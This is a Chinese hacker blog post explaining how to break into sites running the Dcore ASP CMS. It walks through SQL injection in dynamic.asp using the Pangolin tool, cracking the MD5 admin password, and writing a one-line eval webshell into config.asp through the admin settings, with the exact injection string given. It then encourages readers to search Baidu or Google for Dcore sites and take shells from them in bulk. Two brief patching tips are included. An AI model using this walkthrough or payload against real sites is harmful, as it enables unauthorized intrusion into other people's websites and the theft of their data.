危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2307 浏览21469121

Dcore轻型网站管理系统注入漏洞

Dcore是一款轻便灵活、简单易用轻型CMS系统,非常适合用于建立个人博客或企业展示站点。

系统基于ASP+Acess技术,同步生成静态页面,支持多种静态化策略。一般小菜看到静态页面的网站都会头痛,可是这个CMS却是因为过于信任静态页面而忽略了一些最基本的安全性问题导致整个系统出现了漏洞。

漏洞存在于dynamic.asp页面,这个文件的作用是将网站中各个板块内容静态化后显示出来。可是在参数传递的过程中没有对用户传递过来的参数做任何过滤,因此导致了注入的产生,代码我就不写了,有需要的朋友可以联系我。

从上面的代码可以看到直接的就把sql语句执行了,没有经过任何的过滤,所以导致了注入漏洞的产生。

在实际利用中我们可以看到右下角文章归档处的链接是大家所熟悉的asp?的URL形式。这样就给了我们有可乘之机,同时这里也是唯一一个可以用来注入的地方,在这里稍微偷懒下我就把这个url丢进注入工具里跑吧,pangolin一会就跑出来漏洞了,但是在猜解表名的时候我们需要添加这个系统的用户表dcore user,否则工具自带字典里一般是没有这个表名的,(当然手工注入的时候一个一个的去猜解也是可以的,方法这里就不赘述了)。

管理员密码是通过MD5加密过的,这里还存在着一点点运气成分,毕竟如果密码破解不出来的话那一切都是竹篮打水一场空。

网站系统后台默认地址为admin/login.asp,进入后台后发现这个系统的后台功能不少,可是可以利用的地方却不多。一开始看到了一个fckeditor,正兴高采烈的去找上传漏洞的时候发现那些个漏洞都被补上了,其他的地方也没有诸如上传啊,备份数据库之类的漏洞。

经过一番搜索发现这个系统拿webshell的方法还是有的:在后台的网站管理栏目下的基本设置菜单中可以设置网站的基本配置,写入的配置并没有保存在数据库里而是直接修改保存在config.asp页面中,在这里由于系统没有验证管理员输入的内容的合法性,所以导致了可以直接插入一句话后门,构造的一句话后门代码如下:  “%><%eValrequest(”≠}”)%><%a=”。因为程序原来的代码是Public dc_sitename:dc_sitename=…,我们插入的代码中第一个“是闭合前面的配置文件中的”,%>就是闭合前一段脚本,之后插入一句话<%evalrequest%>,最后要闭合原来的%>。之所以要加入a-是因为如果没有这个等号的话,那么就会成<%,这样必将出错,整个网站将会因此而瘫痪,那样篓子可就捅大了,不过我在后面留下了危险漫步到此一流!

在文本框里输入插入的代码之后就可以用一句话客户端连接我们的小马了。

至于这个系统的漏洞修复方法也很简单:

1.在参数传递的过程中加入一系列的非法字符过滤,防止注入漏洞的发生。

2.在代码中设置后台的网站设置项中加入过滤代码。

说完了漏洞的利用,接下来就是批量拿shell了,只要在百度或谷歌中直接搜索Dcore就会出现不少使用这个系统的网站了,然后接下来的事,大家都懂的……